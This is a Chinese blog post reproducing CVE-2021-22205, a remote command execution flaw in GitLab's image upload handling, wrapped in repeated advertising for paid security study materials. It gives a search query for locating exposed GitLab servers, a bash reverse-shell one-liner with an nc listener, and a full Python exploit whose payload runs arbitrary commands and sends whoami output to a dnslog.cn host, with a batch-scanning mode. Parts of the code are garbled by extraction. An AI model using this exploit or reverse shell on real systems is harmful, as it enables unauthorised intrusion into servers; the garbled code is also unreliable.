CVE-2021-22205——Gitlab 远程命令执行漏洞复现(1)

最新推荐文章于 2024-05-27 10:17:21 发布
最新推荐文章于 2024-05-27 10:17:21 发布
阅读量521 收藏 7
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84519718/article/details/138955187
版权

还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!

王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。

对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!

【完整版领取方式在文末!!】

93道网络安全面试题

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

内容实在太多,不一一截图了

黑客学习资源推荐

最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

😝朋友们如果有需要的话,可以联系领取~

1️⃣零基础入门
① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

image

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

image-20231025112050764

2️⃣视频配套工具&国内外网安书籍、文档
① 工具

② 视频

image1

③ 书籍

image2

资源较为敏感,未展示全面,需要的最下面获取

在这里插入图片描述在这里插入图片描述

② 简历模板

在这里插入图片描述

因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

export GITLAB_HOME=/srv/gitlab





sudo docker run –detach </span>  
 –hostname gitlab.example.com </span>  
 –publish 443:443 –publish 80:80 </span>  
 –name gitlab </span>  
 –restart always </span>  
 –volume KaTeX parse error: Undefined control sequence: \< at position 335: …n punctuation">\̲<̲/span> <span …GITLAB\_HOME/logs:/var/log/gitlab </span>  
 –volume $GITLAB\_HOME/data:/var/opt/gitlab </span>  
 gitlab/gitlab-ce:13.9.1-ce.0



* 1
* 2
* 3
* 4
* 5
* 6
* 7
* 8
* 9
* 10
* 11


### Fofa语法

title=“GitLab” && country=“CN”

* 1


![在这里插入图片描述](https://img-blog.csdnimg.cn/d9624b42686347b5b81faae727686d10.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)


### 漏洞利用脚本

https://github.com/Al1ex/CVE-2021-22205

* 1


![在这里插入图片描述](https://img-blog.csdnimg.cn/13fb5d5ab3f340cabb55bef43fa03d07.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/327e56f144fd4fdb877e4e6cb2a6c18c.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)


![在这里插入图片描述](https://img-blog.csdnimg.cn/4c54b935ca8c4da2be0195e93a018733.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)


### 反弹Shell


如果目标主机出网的话,可以尝试反弹Shell


使用linux命令反弹shell

bash -i >& /dev/tcp/ip/port 0>&1

* 1


nc监听10000端口

nc -lvp 10000

* 1


成功上线  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/69b479d57f9547c9ba6a8e6ea6bba1f8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)


执行命令RCE  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/9c5eac74265b4eada86766f9d97072d3.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5paw572R5bel5p2O55m9,size_20,color_FFFFFF,t_70,g_se,x_16)


### Exp

import requests
from bs4 import BeautifulSoup
import base64
import random
import sys
import os
import argparse


requests.packages.urllib3.disable\_warnings()


def title():  
 print("""  
             
 / </span> </span> / / | | </span> /  </span> </span>/ | | </span>| </span>| </span> /  </span>| |  
 | | </span> </span> / /| |  ) | | | |) | | ) | ) | ) | | | | </span>  
 | | </span> V / | ||/ /| |\_| / /| |/ / / / / /| || |) |  
 </span> | </span>/ || ||</span>/|\_| ||||</span>/|\_/




                            <span class="token variable">Author</span><span class="token punctuation">:</span><span class="token variable">Al1ex</span><span class="token punctuation">@</span><span class="token variable">Heptagram</span>
                        <span class="token variable">Github</span><span class="token punctuation">:</span><span class="token variable">https</span><span class="token punctuation">:</span><span class="token punctuation">/</span><span class="token punctuation">/</span><span class="token variable">github</span><span class="token punctuation">.</span><span class="token variable">com</span><span class="token punctuation">/</span><span class="token variable">Al1ex</span>                             
<span class="token string">""</span><span class="token punctuation">"</span><span class="token punctuation">)</span>

print(‘’
验证模式:python CVE-2021-22205.py -v true -t target_url
攻击模式:python CVE-2021-22205.py -a true -t target_url -c command
批量检测:python CVE-2021-22205.py -s true -f file
’‘)


def check(target\_url):  
 session = requests.Session()  
 try:  
 req1 = session.get(target\_url.strip("/") + “/users/sign\_in”, verify=False)  
 soup = BeautifulSoup(req1.text, features=“lxml”)  
 token = soup.findAll(‘meta’)[16].get(“content”)  
 data = “\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=“file”; filename=“test.jpg”\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3”?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared\_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright “\\n” . qx{curl `whoami`.82sm53.dnslog.cn} . \\n" b “) ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5–\r\n\r\n”  
 headers = { 
   
 “User-Agent”: “Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”,  
 “Connection”: “close”,  
 “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”,  
 “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”}  
 flag = ‘Failed to process image’  
 req2 = session.post(target\_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False)  
 if flag in req2.text:  
 print("[+] 目标 {} 存在漏洞".format(target\_url))  
 else:  
 print("[-] 目标 {} 不存在漏洞".format(target\_url))  
 except Exception as e:  
 print(e)


def attack(target\_url,command):  
 session = requests.Session()  
 try:  
 req1 = session.get(target\_url.strip("/") + “/users/sign\_in”, verify=False)  
 soup = BeautifulSoup(req1.text, features=“lxml”)  
 token = soup.findAll(‘meta’)[16].get(“content”)  
 data = “\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5\r\nContent-Disposition: form-data; name=“file”; filename=“test.jpg”\r\nContent-Type: image/jpeg\r\n\r\nAT&TFORM\x00\x00\x03\xafDJVMDIRM\x00\x00\x00.\x81\x00\x02\x00\x00\x00F\x00\x00\x00\xac\xff\xff\xde\xbf\x99 !\xc8\x91N\xeb\x0c\x07\x1f\xd2\xda\x88\xe8k\xe6D\x0f,q\x02\xeeI\xd3n\x95\xbd\xa2\xc3”?FORM\x00\x00\x00^DJVUINFO\x00\x00\x00\n\x00\x08\x00\x08\x18\x00d\x00\x16\x00INCL\x00\x00\x00\x0fshared\_anno.iff\x00BG44\x00\x00\x00\x11\x00J\x01\x02\x00\x08\x00\x08\x8a\xe6\xe1\xb17\xd9\*\x89\x00BG44\x00\x00\x00\x04\x01\x0f\xf9\x9fBG44\x00\x00\x00\x02\x02\nFORM\x00\x00\x03\x07DJVIANTa\x00\x00\x01P(metadata\n\t(Copyright “\\n” . qx{"+ command +"} . \\n" b “) ) \n\r\n------WebKitFormBoundaryIMv3mxRg59TkFSX5–\r\n\r\n”  
 headers = { 
   
 “User-Agent”: “Mozilla/5.0 (X11; Linux x86\_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”,  
 “Connection”: “close”,  
 “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”,  
 “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”}  
 flag = ‘Failed to process image’  
 req2 = session.post(target\_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False)  
 if flag in req2.text:  
 print("[+] 目标 {} 存在漏洞".format(target\_url))  
 print("[+] 请到dnslog或主机检查执行结果")  
 else:  
 print("[-] 目标 {} 不存在漏洞".format(target\_url))  
 except Exception as e:  
 print(e)


def scan(file):  
 for url\_link in open(file, ‘r’, encoding=‘utf-8’):  
 if url\_link.strip() != ‘’:  
 url\_path = format\_url(url\_link.strip())  
 check(url\_path)


def format\_url(url):  
 try:  
 if url[:4] != “http”:  
 url = “https://” + url  
 url = url.strip()  
 return url  
 except Exception as e:  
 print(‘URL 错误 {0}’.format(url))


def main():  
 parser = argparse.ArgumentParser(description=‘GitLab < 13.10.3 RCE’)  
 parser.add\_argument(’-v’, ‘–verify’, type=bool,help=’ 验证模式 ‘)  
 parser.add\_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')

parser.add_argument(‘-a’, ‘–attack’, type=bool, help=’ 攻击模式 ‘)
parser.add_argument(’-c’, ‘–command’, type=str, help=’ 执行命令 ')

parser.add_argument(‘-s’, ‘–scan’, type=bool, help=’ 批量模式 ‘)
parser.add_argument(’-f’, ‘–file’, type=str, help=’ 文件路径 ')

args = parser.parse_args()

verify_model = args.verify
target_url = args.target

attack_model = args.attack
command = args.command

scan_model = args.scan
file = args.file

if verify_model is True and target_url !=None:
check(target_url)
elif attack_model is True and target_url != None and command != None:
attack(target_url,command)
elif scan_model is True and file != None:
scan(file)
else:
sys.exit(0)


if **name** == ‘**main**’:  
 title()  
 main()



* 1
* 2
* 3
* 4
* 5
* 6
* 7
* 8
* 9
* 10
* 11
* 12
* 13
* 14
* 15
* 16
* 17
* 18
* 19
* 20
* 21
* 22
* 23
* 24
* 25
* 26
* 27
* 28
* 29
* 30
* 31
* 32
* 33
* 34
* 35
* 36
* 37
* 38
* 39
* 40
* 41
* 42
* 43
* 44
* 45
* 46
* 47
* 48
* 49
* 50
* 51
* 52
* 53
* 54
* 55
* 56
* 57
* 58
* 59
* 60
* 61
* 62
* 63
* 64
* 65



还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)



**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)

**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84519718
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 8182
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
漏洞复现】4. Gitlab exiftool远程命令执行漏洞CVE-2021-22205复现与分析
Zichel77的博客
03-21 1105
Gitlab是由Gitlab Inc.开发,基于网络的GIt仓库管理工具,且具有wiki和issue跟踪功能,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,通过Web界面进行访问公开的或私人的项目。2021年4月5日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞CVE-2021-22205)。
MongoDB设置登录账号和密码
热门推荐
西瓜游侠的博客
10-20 4万+
设置用户名和密码 安装MongoDB。 使用mongo工具连接数据库(双击打开就行,默认不需要认证账号)。 设置超级管理员账号和密码 use admin db.createUser({ user: 'admin', // 用户名(自定义) pwd: 'Abc123++', // 密码(自定义) roles:[{ role: 'root', // 使用超级用户角色 db: 'admin' // 指定数据库 }] }) 设置完成,可以通过指
Git严重漏洞远程执行代码,Mac和Windows通杀!
最新发布
IT界那些事儿
05-27 8151
不得了了,家人们!就在这几天,Git爆出了一个严重漏洞,编号,一个可以远程执行代码的RCE漏洞!攻击者精心准备一个Git项目,只要你尝试去Clone它,你的电脑就能执行攻击代码沦陷。比如下面这个GitHub上面的项目:你可以执行一下下面的命令:不出意外的话,你的电脑将会弹出计算器程序:能让你弹计算器,就能执行其他更危险的操作,比如给你种木马等等。Git是我们程序员基本离不开的工具,这波漏洞操作,属实是对程序员定向打击了。接下来我们来理一理这个漏洞的工作原理是怎么样的。
CTF日常训练WriteUp之CTF秀靶场
Javachichi的博客
02-11 984
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
CTF秀--菜狗杯
m0_59022585的博客
07-09 2489
再使$_REQUEST[$_GET[$_POST[$_COOKIE['CTFshow-QQ群:']]]][6][0][7][5][8][0][9][4][4]=system("cat /f*"),查看f开头的文件内容。令_GET=a,则有:$key=_GET,$value=a,有:$$key=$_GET=$$value=$a,可知使用GET传入_GET=flag可以得到flag。令cookie中传入CTFshow-QQ群:=a,则有$_POST['a'],令post中传入a=b,则有$_GET['b']。
Hive超详细存储
@小刘同学nice
06-01 1312
文件存储格式 Hive支持的存储数据的格式主要有:TEXTFILE 、SEQUENCEFILE、ORC、PARQUET。 列式存储和行式存储 左边为逻辑表,右边第一个为行式存储,第二个为列式存储 行存储的特点 查询满足条件的一整行数据的时候,列存储则需要去每个聚集的字段找到对应的每个列的值,行存储只需要找到其中一个值,其余的值都在相邻地方,所以此时行存储查询的速度更快。 列存储的特点 因为每个...
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
apache stucts 2远程命令执行漏洞 (CVE-2021-31805) poc检测工具
04-21
检测一个url命令为 python3 CVE-2022-22954-POC.py -u http://test.com 检测多个url命令为 python3 CVE-2022-22954-POC.py -f file.txt(把url按一行一个保存到file.txt中) 结果有可能如下
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
Hive 如何方便地实现存储过程?
rqgxy的博客
05-15 3671
Hive 提供了两种方式实现存储过程,但使用上都不方便。 第一种是 HPL/SQL。这种方式目前还不完善,比如游标使用限制多,很多功能无法实现,对变量要求严格,经常发生不兼容的错误。只要可调试,代码报错并非障碍,但 HPL/SQL 的问题在于不可调试,对于开发者就很不方便。 更不方便的是,HPL/SQL 缺乏 JDBC 接口,无法方便地嵌入 JAVA 程序,只能在 JAVA 中调用命令执行 HPL/SQL,再由 HPL/SQL 实施计算并将结果回写 Hive 临时表,最后 JAVA 通过 Hive 的
CTF秀--2023愚人杯
m0_59022585的博客
07-11 348
使用GET方式传入index.php查看源代码页面,但页面无法直接显示,进入源代码窗口,将base64密文进行解密得到index.php源代码,获得flag。文本文件中出现大量的四句话,推测是base4加密,使用脚本翻译出密文,base4有A(4,4)=24种排列,再使用脚本列出24种明文,找到flag。进入链接没有异常,F12进入控制台,查看url地址,发现是通过GET传入,传入前经过base64加密。压缩包存在加密,010Editor查看发现文件尾有key=,判断是密码,但经过base64加密,
Flink04: Flink核心API之DataSet
anglemanyi的博客
02-22 1226
DataSet API主要可以分为3块来分析:DataSource、Transformation、Sink。
CTF秀--年CTF
m0_59022585的博客
07-11 119
打开链接对PHP代码分析,使year=2022.时,==判断前先转换成字符串型判断为真,year+1后为浮点型,!==判断也为真,得到flag。通过分析密文首部和提示可以知道使用了Rabbit(兔)加密,提示也给出了密码(2023),使用Rabbit解密得到flag。
Java+SQL+MySQL+Hive存储过程汇总
修行的博客
05-27 1362
Java+SQL+MySQL+Hive存储过程汇总 存储过程概念 ​ 在我们做一个复杂的项目时,会多次涉及到与数据库的连接,这时我们会一次次的来用SQL语句进行对数据库的连接,但如果我们这时用存储过程的话就只需要连接一次数据库就可以了,从而省去大量的SQL语句。 存储过程的优点 1、加快运行速度 ​ 对于很简单的sql,存储过程没有什么优势。对于复杂的业务逻辑,因为在存储过程创建的时候,数据库已经对齐进行了一次解析和优化。存储过程一旦执行,在内存中就会保留一份这个存储过程,这样下次再执行同样的存储过程时,可
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
Weblogic远程代码执行漏洞(CVE-2020-14750)修复步骤--weblogic10.3.6版本
gyt931019的博客
03-19 351
Weblogic10.3.6有远程执行代码漏洞,更新最新weblogic解决该问题。
CVE-2021-22205
08-09
CVE-2021-22205是一个与GitLab CE/EE相关的漏洞。根据引用和引用的信息,可以使用python脚本CVE-2021-22205.py来进行批量检测和利用该漏洞。通过运行命令"python3 CVE-2021-22205.py -s true -f target.txt"可以检测目标机器是否存在该漏洞,而通过命令"python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command"可以利用该漏洞执行命令。引用提供了一个反弹shell的示例操作,通过执行一系列命令来实现反向连接并获取shell访问。请注意,此漏洞可能会导致安全风险,请在合法授权的情况下使用该工具。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值